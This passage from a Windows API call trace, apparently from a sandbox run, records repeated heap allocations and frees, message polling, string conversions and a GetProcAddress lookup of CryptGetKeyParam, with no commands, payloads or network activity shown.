Flags=0x0, Size=0x4) returned 0x9c26d8 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0197.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0197.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0197.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0197.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0197.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0197.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0197.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0197.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0197.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.097] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0197.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0197.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0197.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0197.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0197.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0197.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0197.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0197.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0197.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0197.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0197.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0197.098] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0197.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0197.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0197.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0197.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0197.099] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0197.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0197.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0197.099] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0197.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0197.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0197.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0197.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0197.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0197.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0197.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0197.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0197.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0197.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0197.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0197.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0197.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0197.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0197.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0197.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0197.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0197.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0197.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0197.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0197.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0197.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0197.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0197.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0197.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0197.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0197.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0197.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0197.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0197.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0197.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0197.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0197.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0197.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0197.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0197.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0197.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0197.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0197.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0197.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0197.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0197.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0197.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0197.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0197.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0197.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0197.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0197.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0197.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0197.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d420 [0197.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0197.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0197.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.105] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0197.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0197.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0197.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0197.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0197.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0197.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0197.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0197.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0197.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0197.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0197.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0197.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0197.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0197.105] 